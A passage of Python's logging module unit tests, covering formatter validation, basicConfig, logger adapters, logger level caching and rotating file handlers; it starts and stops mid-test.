self.assertRaises(ValueError, logging.Formatter, '{foo:{{w}}.{{p}}}}', style='{')
self.assertRaises(ValueError, logging.Formatter, '{foo!X:{{w}}.{{p}}}', style='{')
self.assertRaises(ValueError, logging.Formatter, '{foo!a:random}', style='{')
self.assertRaises(ValueError, logging.Formatter, '{foo!a:ran{dom}', style='{')
self.assertRaises(ValueError, logging.Formatter, '{foo!a:ran{d}om}', style='{')
self.assertRaises(ValueError, logging.Formatter, '{foo.!a:d}', style='{')
# Dollar style
# Testing failure for mismatch bare $
self.assert_error_message(
ValueError,
"invalid format: bare \'$\' not allowed",
logging.Formatter, '$bar $$$', style='$'
)
self.assert_error_message(
ValueError,
"invalid format: bare \'$\' not allowed",
logging.Formatter, 'bar $', style='$'
)
self.assert_error_message(
ValueError,
"invalid format: bare \'$\' not allowed",
logging.Formatter, 'foo $.', style='$'
)
# Testing failure for mismatch style
self.assert_error_message(
ValueError,
"invalid format: no fields",
logging.Formatter, '{asctime}', style='$'
)
self.assertRaises(ValueError, logging.Formatter, '%(asctime)s', style='$')
# Testing failure for incorrect fields
self.assert_error_message(
ValueError,
"invalid format: no fields",
logging.Formatter, 'foo', style='$'
)
self.assertRaises(ValueError, logging.Formatter, '${asctime', style='$')
def test_invalid_style(self):
self.assertRaises(ValueError, logging.Formatter, None, None, 'x')
def test_time(self):
r = self.get_record()
dt = datetime.datetime(1993, 4, 21, 8, 3, 0, 0, utc)
# We use None to indicate we want the local timezone
# We're essentially converting a UTC time to local time
r.created = time.mktime(dt.astimezone(None).timetuple())
r.msecs = 123
f = logging.Formatter('%(asctime)s %(message)s')
f.converter = time.gmtime
self.assertEqual(f.formatTime(r), '1993-04-21 08:03:00,123')
self.assertEqual(f.formatTime(r, '%Y:%d'), '1993:21')
f.format(r)
self.assertEqual(r.asctime, '1993-04-21 08:03:00,123')
class TestBufferingFormatter(logging.BufferingFormatter):
def formatHeader(self, records):
return '[(%d)' % len(records)
def formatFooter(self, records):
return '(%d)]' % len(records)
class BufferingFormatterTest(unittest.TestCase):
def setUp(self):
self.records = [
logging.makeLogRecord({'msg': 'one'}),
logging.makeLogRecord({'msg': 'two'}),
]
def test_default(self):
f = logging.BufferingFormatter()
self.assertEqual('', f.format([]))
self.assertEqual('onetwo', f.format(self.records))
def test_custom(self):
f = TestBufferingFormatter()
self.assertEqual('[(2)onetwo(2)]', f.format(self.records))
lf = logging.Formatter('<%(message)s>')
f = TestBufferingFormatter(lf)
self.assertEqual('[(2)<one><two>(2)]', f.format(self.records))
class ExceptionTest(BaseTest):
def test_formatting(self):
r = self.root_logger
h = RecordingHandler()
r.addHandler(h)
try:
raise RuntimeError('deliberate mistake')
except:
logging.exception('failed', stack_info=True)
r.removeHandler(h)
h.close()
r = h.records[0]
self.assertTrue(r.exc_text.startswith('Traceback (most recent '
'call last):\n'))
self.assertTrue(r.exc_text.endswith('\nRuntimeError: '
'deliberate mistake'))
self.assertTrue(r.stack_info.startswith('Stack (most recent '
'call last):\n'))
self.assertTrue(r.stack_info.endswith('logging.exception(\'failed\', '
'stack_info=True)'))
class LastResortTest(BaseTest):
def test_last_resort(self):
# Test the last resort handler
root = self.root_logger
root.removeHandler(self.root_hdlr)
old_lastresort = logging.lastResort
old_raise_exceptions = logging.raiseExceptions
try:
with support.captured_stderr() as stderr:
root.debug('This should not appear')
self.assertEqual(stderr.getvalue(), '')
root.warning('Final chance!')
self.assertEqual(stderr.getvalue(), 'Final chance!\n')
# No handlers and no last resort, so 'No handlers' message
logging.lastResort = None
with support.captured_stderr() as stderr:
root.warning('Final chance!')
msg = 'No handlers could be found for logger "root"\n'
self.assertEqual(stderr.getvalue(), msg)
# 'No handlers' message only printed once
with support.captured_stderr() as stderr:
root.warning('Final chance!')
self.assertEqual(stderr.getvalue(), '')
# If raiseExceptions is False, no message is printed
root.manager.emittedNoHandlerWarning = False
logging.raiseExceptions = False
with support.captured_stderr() as stderr:
root.warning('Final chance!')
self.assertEqual(stderr.getvalue(), '')
finally:
root.addHandler(self.root_hdlr)
logging.lastResort = old_lastresort
logging.raiseExceptions = old_raise_exceptions
class FakeHandler:
def __init__(self, identifier, called):
for method in ('acquire', 'flush', 'close', 'release'):
setattr(self, method, self.record_call(identifier, method, called))
def record_call(self, identifier, method_name, called):
def inner():
called.append('{} - {}'.format(identifier, method_name))
return inner
class RecordingHandler(logging.NullHandler):
def __init__(self, *args, **kwargs):
super(RecordingHandler, self).__init__(*args, **kwargs)
self.records = []
def handle(self, record):
"""Keep track of all the emitted records."""
self.records.append(record)
class ShutdownTest(BaseTest):
"""Test suite for the shutdown method."""
def setUp(self):
super(ShutdownTest, self).setUp()
self.called = []
raise_exceptions = logging.raiseExceptions
self.addCleanup(setattr, logging, 'raiseExceptions', raise_exceptions)
def raise_error(self, error):
def inner():
raise error()
return inner
def test_no_failure(self):
# create some fake handlers
handler0 = FakeHandler(0, self.called)
handler1 = FakeHandler(1, self.called)
handler2 = FakeHandler(2, self.called)
# create live weakref to those handlers
handlers = map(logging.weakref.ref, [handler0, handler1, handler2])
logging.shutdown(handlerList=list(handlers))
expected = ['2 - acquire', '2 - flush', '2 - close', '2 - release',
'1 - acquire', '1 - flush', '1 - close', '1 - release',
'0 - acquire', '0 - flush', '0 - close', '0 - release']
self.assertEqual(expected, self.called)
def _test_with_failure_in_method(self, method, error):
handler = FakeHandler(0, self.called)
setattr(handler, method, self.raise_error(error))
handlers = [logging.weakref.ref(handler)]
logging.shutdown(handlerList=list(handlers))
self.assertEqual('0 - release', self.called[-1])
def test_with_ioerror_in_acquire(self):
self._test_with_failure_in_method('acquire', OSError)
def test_with_ioerror_in_flush(self):
self._test_with_failure_in_method('flush', OSError)
def test_with_ioerror_in_close(self):
self._test_with_failure_in_method('close', OSError)
def test_with_valueerror_in_acquire(self):
self._test_with_failure_in_method('acquire', ValueError)
def test_with_valueerror_in_flush(self):
self._test_with_failure_in_method('flush', ValueError)
def test_with_valueerror_in_close(self):
self._test_with_failure_in_method('close', ValueError)
def test_with_other_error_in_acquire_without_raise(self):
logging.raiseExceptions = False
self._test_with_failure_in_method('acquire', IndexError)
def test_with_other_error_in_flush_without_raise(self):
logging.raiseExceptions = False
self._test_with_failure_in_method('flush', IndexError)
def test_with_other_error_in_close_without_raise(self):
logging.raiseExceptions = False
self._test_with_failure_in_method('close', IndexError)
def test_with_other_error_in_acquire_with_raise(self):
logging.raiseExceptions = True
self.assertRaises(IndexError, self._test_with_failure_in_method,
'acquire', IndexError)
def test_with_other_error_in_flush_with_raise(self):
logging.raiseExceptions = True
self.assertRaises(IndexError, self._test_with_failure_in_method,
'flush', IndexError)
def test_with_other_error_in_close_with_raise(self):
logging.raiseExceptions = True
self.assertRaises(IndexError, self._test_with_failure_in_method,
'close', IndexError)
class ModuleLevelMiscTest(BaseTest):
"""Test suite for some module level methods."""
def test_disable(self):
old_disable = logging.root.manager.disable
# confirm our assumptions are correct
self.assertEqual(old_disable, 0)
self.addCleanup(logging.disable, old_disable)
logging.disable(83)
self.assertEqual(logging.root.manager.disable, 83)
self.assertRaises(ValueError, logging.disable, "doesnotexists")
class _NotAnIntOrString:
pass
self.assertRaises(TypeError, logging.disable, _NotAnIntOrString())
logging.disable("WARN")
# test the default value introduced in 3.7
# (Issue #28524)
logging.disable()
self.assertEqual(logging.root.manager.disable, logging.CRITICAL)
def _test_log(self, method, level=None):
called = []
support.patch(self, logging, 'basicConfig',
lambda *a, **kw: called.append((a, kw)))
recording = RecordingHandler()
logging.root.addHandler(recording)
log_method = getattr(logging, method)
if level is not None:
log_method(level, "test me: %r", recording)
else:
log_method("test me: %r", recording)
self.assertEqual(len(recording.records), 1)
record = recording.records[0]
self.assertEqual(record.getMessage(), "test me: %r" % recording)
expected_level = level if level is not None else getattr(logging, method.upper())
self.assertEqual(record.levelno, expected_level)
# basicConfig was not called!
self.assertEqual(called, [])
def test_log(self):
self._test_log('log', logging.ERROR)
def test_debug(self):
self._test_log('debug')
def test_info(self):
self._test_log('info')
def test_warning(self):
self._test_log('warning')
def test_error(self):
self._test_log('error')
def test_critical(self):
self._test_log('critical')
def test_set_logger_class(self):
self.assertRaises(TypeError, logging.setLoggerClass, object)
class MyLogger(logging.Logger):
pass
logging.setLoggerClass(MyLogger)
self.assertEqual(logging.getLoggerClass(), MyLogger)
logging.setLoggerClass(logging.Logger)
self.assertEqual(logging.getLoggerClass(), logging.Logger)
def test_subclass_logger_cache(self):
# bpo-37258
message = []
class MyLogger(logging.getLoggerClass()):
def __init__(self, name='MyLogger', level=logging.NOTSET):
super().__init__(name, level)
message.append('initialized')
logging.setLoggerClass(MyLogger)
logger = logging.getLogger('just_some_logger')
self.assertEqual(message, ['initialized'])
stream = io.StringIO()
h = logging.StreamHandler(stream)
logger.addHandler(h)
try:
logger.setLevel(logging.DEBUG)
logger.debug("hello")
self.assertEqual(stream.getvalue().strip(), "hello")
stream.truncate(0)
stream.seek(0)
logger.setLevel(logging.INFO)
logger.debug("hello")
self.assertEqual(stream.getvalue(), "")
finally:
logger.removeHandler(h)
h.close()
logging.setLoggerClass(logging.Logger)
@support.requires_type_collecting
def test_logging_at_shutdown(self):
# Issue #20037
code = """if 1:
import logging
class A:
def __del__(self):
try:
raise ValueError("some error")
except Exception:
logging.exception("exception in __del__")
a = A()"""
rc, out, err = assert_python_ok("-c", code)
err = err.decode()
self.assertIn("exception in __del__", err)
self.assertIn("ValueError: some error", err)
@unittest.skipIf(hasattr(sys, "pyston_version_info"), "Pyston disables recursion checking")
def test_recursion_error(self):
# Issue 36272
code = """if 1:
import logging
def rec():
logging.error("foo")
rec()
rec()"""
rc, out, err = assert_python_failure("-c", code)
err = err.decode()
self.assertNotIn("Cannot recover from stack overflow.", err)
self.assertEqual(rc, 1)
class LogRecordTest(BaseTest):
def test_str_rep(self):
r = logging.makeLogRecord({})
s = str(r)
self.assertTrue(s.startswith('<LogRecord: '))
self.assertTrue(s.endswith('>'))
def test_dict_arg(self):
h = RecordingHandler()
r = logging.getLogger()
r.addHandler(h)
d = {'less' : 'more' }
logging.warning('less is %(less)s', d)
self.assertIs(h.records[0].args, d)
self.assertEqual(h.records[0].message, 'less is more')
r.removeHandler(h)
h.close()
def test_multiprocessing(self):
r = logging.makeLogRecord({})
self.assertEqual(r.processName, 'MainProcess')
try:
import multiprocessing as mp
r = logging.makeLogRecord({})
self.assertEqual(r.processName, mp.current_process().name)
except ImportError:
pass
def test_optional(self):
r = logging.makeLogRecord({})
NOT_NONE = self.assertIsNotNone
NOT_NONE(r.thread)
NOT_NONE(r.threadName)
NOT_NONE(r.process)
NOT_NONE(r.processName)
log_threads = logging.logThreads
log_processes = logging.logProcesses
log_multiprocessing = logging.logMultiprocessing
try:
logging.logThreads = False
logging.logProcesses = False
logging.logMultiprocessing = False
r = logging.makeLogRecord({})
NONE = self.assertIsNone
NONE(r.thread)
NONE(r.threadName)
NONE(r.process)
NONE(r.processName)
finally:
logging.logThreads = log_threads
logging.logProcesses = log_processes
logging.logMultiprocessing = log_multiprocessing
class BasicConfigTest(unittest.TestCase):
"""Test suite for logging.basicConfig."""
def setUp(self):
super(BasicConfigTest, self).setUp()
self.handlers = logging.root.handlers
self.saved_handlers = logging._handlers.copy()
self.saved_handler_list = logging._handlerList[:]
self.original_logging_level = logging.root.level
self.addCleanup(self.cleanup)
logging.root.handlers = []
def tearDown(self):
for h in logging.root.handlers[:]:
logging.root.removeHandler(h)
h.close()
super(BasicConfigTest, self).tearDown()
def cleanup(self):
setattr(logging.root, 'handlers', self.handlers)
logging._handlers.clear()
logging._handlers.update(self.saved_handlers)
logging._handlerList[:] = self.saved_handler_list
logging.root.setLevel(self.original_logging_level)
def test_no_kwargs(self):
logging.basicConfig()
# handler defaults to a StreamHandler to sys.stderr
self.assertEqual(len(logging.root.handlers), 1)
handler = logging.root.handlers[0]
self.assertIsInstance(handler, logging.StreamHandler)
self.assertEqual(handler.stream, sys.stderr)
formatter = handler.formatter
# format defaults to logging.BASIC_FORMAT
self.assertEqual(formatter._style._fmt, logging.BASIC_FORMAT)
# datefmt defaults to None
self.assertIsNone(formatter.datefmt)
# style defaults to %
self.assertIsInstance(formatter._style, logging.PercentStyle)
# level is not explicitly set
self.assertEqual(logging.root.level, self.original_logging_level)
def test_strformatstyle(self):
with support.captured_stdout() as output:
logging.basicConfig(stream=sys.stdout, style="{")
logging.error("Log an error")
sys.stdout.seek(0)
self.assertEqual(output.getvalue().strip(),
"ERROR:root:Log an error")
def test_stringtemplatestyle(self):
with support.captured_stdout() as output:
logging.basicConfig(stream=sys.stdout, style="$")
logging.error("Log an error")
sys.stdout.seek(0)
self.assertEqual(output.getvalue().strip(),
"ERROR:root:Log an error")
def test_filename(self):
def cleanup(h1, h2, fn):
h1.close()
h2.close()
os.remove(fn)
logging.basicConfig(filename='test.log')
self.assertEqual(len(logging.root.handlers), 1)
handler = logging.root.handlers[0]
self.assertIsInstance(handler, logging.FileHandler)
expected = logging.FileHandler('test.log', 'a')
self.assertEqual(handler.stream.mode, expected.stream.mode)
self.assertEqual(handler.stream.name, expected.stream.name)
self.addCleanup(cleanup, handler, expected, 'test.log')
def test_filemode(self):
def cleanup(h1, h2, fn):
h1.close()
h2.close()
os.remove(fn)
logging.basicConfig(filename='test.log', filemode='wb')
handler = logging.root.handlers[0]
expected = logging.FileHandler('test.log', 'wb')
self.assertEqual(handler.stream.mode, expected.stream.mode)
self.addCleanup(cleanup, handler, expected, 'test.log')
def test_stream(self):
stream = io.StringIO()
self.addCleanup(stream.close)
logging.basicConfig(stream=stream)
self.assertEqual(len(logging.root.handlers), 1)
handler = logging.root.handlers[0]
self.assertIsInstance(handler, logging.StreamHandler)
self.assertEqual(handler.stream, stream)
def test_format(self):
logging.basicConfig(format='%(asctime)s - %(message)s')
formatter = logging.root.handlers[0].formatter
self.assertEqual(formatter._style._fmt, '%(asctime)s - %(message)s')
def test_datefmt(self):
logging.basicConfig(datefmt='bar')
formatter = logging.root.handlers[0].formatter
self.assertEqual(formatter.datefmt, 'bar')
def test_style(self):
logging.basicConfig(style='$')
formatter = logging.root.handlers[0].formatter
self.assertIsInstance(formatter._style, logging.StringTemplateStyle)
def test_level(self):
old_level = logging.root.level
self.addCleanup(logging.root.setLevel, old_level)
logging.basicConfig(level=57)
self.assertEqual(logging.root.level, 57)
# Test that second call has no effect
logging.basicConfig(level=58)
self.assertEqual(logging.root.level, 57)
def test_incompatible(self):
assertRaises = self.assertRaises
handlers = [logging.StreamHandler()]
stream = sys.stderr
assertRaises(ValueError, logging.basicConfig, filename='test.log',
stream=stream)
assertRaises(ValueError, logging.basicConfig, filename='test.log',
handlers=handlers)
assertRaises(ValueError, logging.basicConfig, stream=stream,
handlers=handlers)
# Issue 23207: test for invalid kwargs
assertRaises(ValueError, logging.basicConfig, loglevel=logging.INFO)
# Should pop both filename and filemode even if filename is None
logging.basicConfig(filename=None, filemode='a')
def test_handlers(self):
handlers = [
logging.StreamHandler(),
logging.StreamHandler(sys.stdout),
logging.StreamHandler(),
]
f = logging.Formatter()
handlers[2].setFormatter(f)
logging.basicConfig(handlers=handlers)
self.assertIs(handlers[0], logging.root.handlers[0])
self.assertIs(handlers[1], logging.root.handlers[1])
self.assertIs(handlers[2], logging.root.handlers[2])
self.assertIsNotNone(handlers[0].formatter)
self.assertIsNotNone(handlers[1].formatter)
self.assertIs(handlers[2].formatter, f)
self.assertIs(handlers[0].formatter, handlers[1].formatter)
def test_force(self):
old_string_io = io.StringIO()
new_string_io = io.StringIO()
old_handlers = [logging.StreamHandler(old_string_io)]
new_handlers = [logging.StreamHandler(new_string_io)]
logging.basicConfig(level=logging.WARNING, handlers=old_handlers)
logging.warning('warn')
logging.info('info')
logging.debug('debug')
self.assertEqual(len(logging.root.handlers), 1)
logging.basicConfig(level=logging.INFO, handlers=new_handlers,
force=True)
logging.warning('warn')
logging.info('info')
logging.debug('debug')
self.assertEqual(len(logging.root.handlers), 1)
self.assertEqual(old_string_io.getvalue().strip(),
'WARNING:root:warn')
self.assertEqual(new_string_io.getvalue().strip(),
'WARNING:root:warn\nINFO:root:info')
def _test_log(self, method, level=None):
# logging.root has no handlers so basicConfig should be called
called = []
old_basic_config = logging.basicConfig
def my_basic_config(*a, **kw):
old_basic_config()
old_level = logging.root.level
logging.root.setLevel(100) # avoid having messages in stderr
self.addCleanup(logging.root.setLevel, old_level)
called.append((a, kw))
support.patch(self, logging, 'basicConfig', my_basic_config)
log_method = getattr(logging, method)
if level is not None:
log_method(level, "test me")
else:
log_method("test me")
# basicConfig was called with no arguments
self.assertEqual(called, [((), {})])
def test_log(self):
self._test_log('log', logging.WARNING)
def test_debug(self):
self._test_log('debug')
def test_info(self):
self._test_log('info')
def test_warning(self):
self._test_log('warning')
def test_error(self):
self._test_log('error')
def test_critical(self):
self._test_log('critical')
class LoggerAdapterTest(unittest.TestCase):
def setUp(self):
super(LoggerAdapterTest, self).setUp()
old_handler_list = logging._handlerList[:]
self.recording = RecordingHandler()
self.logger = logging.root
self.logger.addHandler(self.recording)
self.addCleanup(self.logger.removeHandler, self.recording)
self.addCleanup(self.recording.close)
def cleanup():
logging._handlerList[:] = old_handler_list
self.addCleanup(cleanup)
self.addCleanup(logging.shutdown)
self.adapter = logging.LoggerAdapter(logger=self.logger, extra=None)
def test_exception(self):
msg = 'testing exception: %r'
exc = None
try:
1 / 0
except ZeroDivisionError as e:
exc = e
self.adapter.exception(msg, self.recording)
self.assertEqual(len(self.recording.records), 1)
record = self.recording.records[0]
self.assertEqual(record.levelno, logging.ERROR)
self.assertEqual(record.msg, msg)
self.assertEqual(record.args, (self.recording,))
self.assertEqual(record.exc_info,
(exc.__class__, exc, exc.__traceback__))
def test_exception_excinfo(self):
try:
1 / 0
except ZeroDivisionError as e:
exc = e
self.adapter.exception('exc_info test', exc_info=exc)
self.assertEqual(len(self.recording.records), 1)
record = self.recording.records[0]
self.assertEqual(record.exc_info,
(exc.__class__, exc, exc.__traceback__))
def test_critical(self):
msg = 'critical test! %r'
self.adapter.critical(msg, self.recording)
self.assertEqual(len(self.recording.records), 1)
record = self.recording.records[0]
self.assertEqual(record.levelno, logging.CRITICAL)
self.assertEqual(record.msg, msg)
self.assertEqual(record.args, (self.recording,))
def test_is_enabled_for(self):
old_disable = self.adapter.logger.manager.disable
self.adapter.logger.manager.disable = 33
self.addCleanup(setattr, self.adapter.logger.manager, 'disable',
old_disable)
self.assertFalse(self.adapter.isEnabledFor(32))
def test_has_handlers(self):
self.assertTrue(self.adapter.hasHandlers())
for handler in self.logger.handlers:
self.logger.removeHandler(handler)
self.assertFalse(self.logger.hasHandlers())
self.assertFalse(self.adapter.hasHandlers())
def test_nested(self):
class Adapter(logging.LoggerAdapter):
prefix = 'Adapter'
def process(self, msg, kwargs):
return f"{self.prefix} {msg}", kwargs
msg = 'Adapters can be nested, yo.'
adapter = Adapter(logger=self.logger, extra=None)
adapter_adapter = Adapter(logger=adapter, extra=None)
adapter_adapter.prefix = 'AdapterAdapter'
self.assertEqual(repr(adapter), repr(adapter_adapter))
adapter_adapter.log(logging.CRITICAL, msg, self.recording)
self.assertEqual(len(self.recording.records), 1)
record = self.recording.records[0]
self.assertEqual(record.levelno, logging.CRITICAL)
self.assertEqual(record.msg, f"Adapter AdapterAdapter {msg}")
self.assertEqual(record.args, (self.recording,))
orig_manager = adapter_adapter.manager
self.assertIs(adapter.manager, orig_manager)
self.assertIs(self.logger.manager, orig_manager)
temp_manager = object()
try:
adapter_adapter.manager = temp_manager
self.assertIs(adapter_adapter.manager, temp_manager)
self.assertIs(adapter.manager, temp_manager)
self.assertIs(self.logger.manager, temp_manager)
finally:
adapter_adapter.manager = orig_manager
self.assertIs(adapter_adapter.manager, orig_manager)
self.assertIs(adapter.manager, orig_manager)
self.assertIs(self.logger.manager, orig_manager)
class LoggerTest(BaseTest):
def setUp(self):
super(LoggerTest, self).setUp()
self.recording = RecordingHandler()
self.logger = logging.Logger(name='blah')
self.logger.addHandler(self.recording)
self.addCleanup(self.logger.removeHandler, self.recording)
self.addCleanup(self.recording.close)
self.addCleanup(logging.shutdown)
def test_set_invalid_level(self):
self.assertRaises(TypeError, self.logger.setLevel, object())
def test_exception(self):
msg = 'testing exception: %r'
exc = None
try:
1 / 0
except ZeroDivisionError as e:
exc = e
self.logger.exception(msg, self.recording)
self.assertEqual(len(self.recording.records), 1)
record = self.recording.records[0]
self.assertEqual(record.levelno, logging.ERROR)
self.assertEqual(record.msg, msg)
self.assertEqual(record.args, (self.recording,))
self.assertEqual(record.exc_info,
(exc.__class__, exc, exc.__traceback__))
def test_log_invalid_level_with_raise(self):
with support.swap_attr(logging, 'raiseExceptions', True):
self.assertRaises(TypeError, self.logger.log, '10', 'test message')
def test_log_invalid_level_no_raise(self):
with support.swap_attr(logging, 'raiseExceptions', False):
self.logger.log('10', 'test message') # no exception happens
def test_find_caller_with_stack_info(self):
called = []
support.patch(self, logging.traceback, 'print_stack',
lambda f, file: called.append(file.getvalue()))
self.logger.findCaller(stack_info=True)
self.assertEqual(len(called), 1)
self.assertEqual('Stack (most recent call last):\n', called[0])
def test_find_caller_with_stacklevel(self):
the_level = 1
def innermost():
self.logger.warning('test', stacklevel=the_level)
def inner():
innermost()
def outer():
inner()
records = self.recording.records
outer()
self.assertEqual(records[-1].funcName, 'innermost')
lineno = records[-1].lineno
the_level += 1
outer()
self.assertEqual(records[-1].funcName, 'inner')
self.assertGreater(records[-1].lineno, lineno)
lineno = records[-1].lineno
the_level += 1
outer()
self.assertEqual(records[-1].funcName, 'outer')
self.assertGreater(records[-1].lineno, lineno)
lineno = records[-1].lineno
the_level += 1
outer()
self.assertEqual(records[-1].funcName, 'test_find_caller_with_stacklevel')
self.assertGreater(records[-1].lineno, lineno)
def test_make_record_with_extra_overwrite(self):
name = 'my record'
level = 13
fn = lno = msg = args = exc_info = func = sinfo = None
rv = logging._logRecordFactory(name, level, fn, lno, msg, args,
exc_info, func, sinfo)
for key in ('message', 'asctime') + tuple(rv.__dict__.keys()):
extra = {key: 'some value'}
self.assertRaises(KeyError, self.logger.makeRecord, name, level,
fn, lno, msg, args, exc_info,
extra=extra, sinfo=sinfo)
def test_make_record_with_extra_no_overwrite(self):
name = 'my record'
level = 13
fn = lno = msg = args = exc_info = func = sinfo = None
extra = {'valid_key': 'some value'}
result = self.logger.makeRecord(name, level, fn, lno, msg, args,
exc_info, extra=extra, sinfo=sinfo)
self.assertIn('valid_key', result.__dict__)
def test_has_handlers(self):
self.assertTrue(self.logger.hasHandlers())
for handler in self.logger.handlers:
self.logger.removeHandler(handler)
self.assertFalse(self.logger.hasHandlers())
def test_has_handlers_no_propagate(self):
child_logger = logging.getLogger('blah.child')
child_logger.propagate = False
self.assertFalse(child_logger.hasHandlers())
def test_is_enabled_for(self):
old_disable = self.logger.manager.disable
self.logger.manager.disable = 23
self.addCleanup(setattr, self.logger.manager, 'disable', old_disable)
self.assertFalse(self.logger.isEnabledFor(22))
def test_is_enabled_for_disabled_logger(self):
old_disabled = self.logger.disabled
old_disable = self.logger.manager.disable
self.logger.disabled = True
self.logger.manager.disable = 21
self.addCleanup(setattr, self.logger, 'disabled', old_disabled)
self.addCleanup(setattr, self.logger.manager, 'disable', old_disable)
self.assertFalse(self.logger.isEnabledFor(22))
def test_root_logger_aliases(self):
root = logging.getLogger()
self.assertIs(root, logging.root)
self.assertIs(root, logging.getLogger(None))
self.assertIs(root, logging.getLogger(''))
self.assertIs(root, logging.getLogger('foo').root)
self.assertIs(root, logging.getLogger('foo.bar').root)
self.assertIs(root, logging.getLogger('foo').parent)
self.assertIsNot(root, logging.getLogger('\0'))
self.assertIsNot(root, logging.getLogger('foo.bar').parent)
def test_invalid_names(self):
self.assertRaises(TypeError, logging.getLogger, any)
self.assertRaises(TypeError, logging.getLogger, b'foo')
def test_pickling(self):
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
for name in ('', 'root', 'foo', 'foo.bar', 'baz.bar'):
logger = logging.getLogger(name)
s = pickle.dumps(logger, proto)
unpickled = pickle.loads(s)
self.assertIs(unpickled, logger)
def test_caching(self):
root = self.root_logger
logger1 = logging.getLogger("abc")
logger2 = logging.getLogger("abc.def")
# Set root logger level and ensure cache is empty
root.setLevel(logging.ERROR)
self.assertEqual(logger2.getEffectiveLevel(), logging.ERROR)
self.assertEqual(logger2._cache, {})
# Ensure cache is populated and calls are consistent
self.assertTrue(logger2.isEnabledFor(logging.ERROR))
self.assertFalse(logger2.isEnabledFor(logging.DEBUG))
self.assertEqual(logger2._cache, {logging.ERROR: True, logging.DEBUG: False})
self.assertEqual(root._cache, {})
self.assertTrue(logger2.isEnabledFor(logging.ERROR))
# Ensure root cache gets populated
self.assertEqual(root._cache, {})
self.assertTrue(root.isEnabledFor(logging.ERROR))
self.assertEqual(root._cache, {logging.ERROR: True})
# Set parent logger level and ensure caches are emptied
logger1.setLevel(logging.CRITICAL)
self.assertEqual(logger2.getEffectiveLevel(), logging.CRITICAL)
self.assertEqual(logger2._cache, {})
# Ensure logger2 uses parent logger's effective level
self.assertFalse(logger2.isEnabledFor(logging.ERROR))
# Set level to NOTSET and ensure caches are empty
logger2.setLevel(logging.NOTSET)
self.assertEqual(logger2.getEffectiveLevel(), logging.CRITICAL)
self.assertEqual(logger2._cache, {})
self.assertEqual(logger1._cache, {})
self.assertEqual(root._cache, {})
# Verify logger2 follows parent and not root
self.assertFalse(logger2.isEnabledFor(logging.ERROR))
self.assertTrue(logger2.isEnabledFor(logging.CRITICAL))
self.assertFalse(logger1.isEnabledFor(logging.ERROR))
self.assertTrue(logger1.isEnabledFor(logging.CRITICAL))
self.assertTrue(root.isEnabledFor(logging.ERROR))
# Disable logging in manager and ensure caches are clear
logging.disable()
self.assertEqual(logger2.getEffectiveLevel(), logging.CRITICAL)
self.assertEqual(logger2._cache, {})
self.assertEqual(logger1._cache, {})
self.assertEqual(root._cache, {})
# Ensure no loggers are enabled
self.assertFalse(logger1.isEnabledFor(logging.CRITICAL))
self.assertFalse(logger2.isEnabledFor(logging.CRITICAL))
self.assertFalse(root.isEnabledFor(logging.CRITICAL))
class BaseFileTest(BaseTest):
"Base class for handler tests that write log files"
def setUp(self):
BaseTest.setUp(self)
fd, self.fn = tempfile.mkstemp(".log", "test_logging-2-")
os.close(fd)
self.rmfiles = []
def tearDown(self):
for fn in self.rmfiles:
os.unlink(fn)
if os.path.exists(self.fn):
os.unlink(self.fn)
BaseTest.tearDown(self)
def assertLogFile(self, filename):
"Assert a log file is there and register it for deletion"
self.assertTrue(os.path.exists(filename),
msg="Log file %r does not exist" % filename)
self.rmfiles.append(filename)
class FileHandlerTest(BaseFileTest):
def test_delay(self):
os.unlink(self.fn)
fh = logging.FileHandler(self.fn, delay=True)
self.assertIsNone(fh.stream)
self.assertFalse(os.path.exists(self.fn))
fh.handle(logging.makeLogRecord({}))
self.assertIsNotNone(fh.stream)
self.assertTrue(os.path.exists(self.fn))
fh.close()
class RotatingFileHandlerTest(BaseFileTest):
def next_rec(self):
return logging.LogRecord('n', logging.DEBUG, 'p', 1,
self.next_message(), None, None, None)
def test_should_not_rollover(self):
# If maxbytes is zero rollover never occurs
rh = logging.handlers.RotatingFileHandler(self.fn, maxBytes=0)
self.assertFalse(rh.shouldRollover(None))
rh.close()
def test_should_rollover(self):
rh = logging.handlers.RotatingFileHandler(self.fn, maxBytes=1)
self.assertTrue(rh.shouldRollover(self.next_rec()))
rh.close()
def test_file_created(self):
# checks that the file is created and assumes it was created
# by us
rh = logging.handlers.RotatingFileHandler(self.fn)
rh.emit(self.next_rec())
self.assertLogFile(self.fn)
rh.close()
def test_rollover_filenames(self):
def namer(name):
return name + ".test"
rh = logging.handlers.RotatingFileHandler(
self.fn, backupCount=2, maxBytes=1)
rh.namer = namer
rh.emit(self.next_rec())
self.assertLogFile(self.fn)
rh.emit(self.next_rec())
self.assertLogFile(namer(self.fn + ".1"))
rh.emit(self.next_rec())
self.assertLogFile(namer(self.fn + ".2"))
self.assertFalse(os.path.exists(namer(self.fn + ".3")))
rh.close()
@support.requires_zlib
def test_rotator(self):
def namer(name):
return name + ".gz"
def rotator(source, dest):
with open(source, "rb") as sf:
data = sf.read()
compressed = zlib.compress(data, 9)
with open(dest, "wb") as df:
df.write(compressed)
os.remove(source)
rh = logging.handlers.RotatingFileHandler(
self.fn, backupCount=2, maxBytes=1)
rh.rotator = rotator
rh.namer = namer
m1 = self.next_rec()
rh.emit(m1)
self.assertLogFile(self.fn)
m2 = self.next_rec()
rh.emit(m2)
fn = namer(self.fn + ".1")
self.assertLogFile(fn)
newline = os.linesep
with open(fn, "rb") as f:
compressed = f.read()
data = zlib.decompress(compressed)
self.assertEqual(data.decode("ascii"), m1.msg + newline)
rh.emit(self.next_rec())
fn = namer(self.fn + ".2")
self.assertLogFile(fn)
with open(fn, "rb") as f:
compressed = f.read()
data = zlib.decompress(compressed)
self.assertEqual(data.decode("ascii"), m1.msg + newline)
rh.emit(self.next_rec())
fn = namer(self.fn + ".2")
with open(fn, "rb") as f:
compressed = f.read()
data = zlib.decompress(compressed)
self.assertEqual(data.decode("ascii"), m2.msg + newline)
self.assertFalse(os.path.exists(namer(self.fn + ".3")))
rh.close()
class TimedRotatingFileHandlerTest(BaseFileTest):
# other test methods added below
def test_rollover(self):
fh = logging.handlers.TimedRotatingFileHandler(self.fn, 'S',
backupCount=1)
fmt = logging.Formatter('%(asctime)s %(message)s')
fh.setFormatter(fmt)
r1 = logging.makeLogRecord({'msg': 'testing - initial'})
fh.emit(r1)
self.assertLogFile(self.fn)
time.sleep(1.1) # a little over a second ...
r2 = logging.makeLogRecord({'msg': 'testing - after delay'})
fh.emit(r2)
fh.close()
# At this point, we should have a recent rotated file which we
